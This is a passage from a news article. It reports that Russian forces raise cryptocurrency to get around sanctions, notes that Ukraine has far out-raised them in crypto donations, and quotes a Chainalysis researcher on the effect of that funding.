Millions of dollars in cryptocurrency funding to Russian troops may be the least of Ukraine’s problems in a war where Russia has thrown billions into its invasion force. Ukraine, it’s worth noting, has also vastly out-raised Russia in cryptocurrency: By Elliptic’s count, the Ukrainian government has collected more than $77 million in crypto donations since the war began. But that is to be expected, given the West’s broad support of Ukraine following Russia’s unprovoked aggression and the global sanctions placed on Russia. And even the smaller amount of cryptocurrency Russian forces have raised demonstrates cryptocurrency’s ongoing potential to circumvent those sanctions and offer another financial lifeline to Russia’s war machine.

“It’s not like Russia is buying new tanks with this money. They’re paying for thermal imaging scopes and UAVs,” says Andrew Fierman, a sanctions-focused Chainalysis researcher. “But for grassroots facilitation of these militia efforts, any amount of money that they receive to bolster their gear is going to have an impact.” And despite all the light that cryptocurrency tracers can shine on that funding—and the West’s best efforts to stop it—the crypto flow into Russia’s war chest continues.

Tag

#acer